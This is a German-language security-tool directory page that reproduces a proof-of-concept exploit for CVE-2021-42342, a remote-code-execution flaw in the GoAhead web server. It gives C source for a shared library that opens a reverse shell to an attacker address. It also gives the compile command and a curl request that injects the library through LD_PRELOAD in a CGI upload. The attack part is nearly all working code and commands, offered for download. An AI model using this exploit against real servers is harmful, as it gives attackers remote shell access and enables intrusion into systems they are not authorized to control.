Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-42342 — Proof-of-Concept-Exploit für CVE-2021-42342, eine Remote-Code-Ausführungs-Schwachstelle im GoAhead-Webserver, die die LD_PRELOAD-Injektion über CGI demonstriert, um Codeausführung und eine Reverse Shell zu erreichen. | Kitploit
Tools/GitHubGitHub/mr-xn/cve-2021-42342
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubmr-xn/cve-2021-42342

CVE-2021-42342

Proof-of-Concept-Exploit für CVE-2021-42342, eine Remote-Code-Ausführungs-Schwachstelle im GoAhead-Webserver, die die LD_PRELOAD-Injektion über CGI demonstriert, um Codeausführung und eine Reverse Shell zu erreichen.

Repository anzeigen
416vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-42342

CVE-2021-42342 RCE

POC1: gibt nur etwas aus

root@kitploit:~
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello World!\n", 14);
}

POC2: Reverse Shell

root@kitploit:~
#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>

char *server_ip="***";
uint32_t server_port=7777;

static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void) 
{
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in attacker_addr = {0};
  attacker_addr.sin_family = AF_INET;
  attacker_addr.sin_port = htons(server_port);
  attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
  if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
    exit(0);
  dup2(sock, 0);
  dup2(sock, 1);
  dup2(sock, 2);
  execve("/bin/bash", 0, 0);
}

Verwendung:

Schritt 1: gcc hack.c -fPIC -shared -o poc.so

Schritt 2: curl -X POST http://[TARGET]/cgi-bin/ -F "LD_PRELOAD=/proc/self/fd/0" -F file='@poc.so;encoder=base64'

von:

  • https://github.com/kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-
  • https://mp.weixin.qq.com/s/AS9DHeHtgqrgjTb2gzLJZg
Tool herunterladen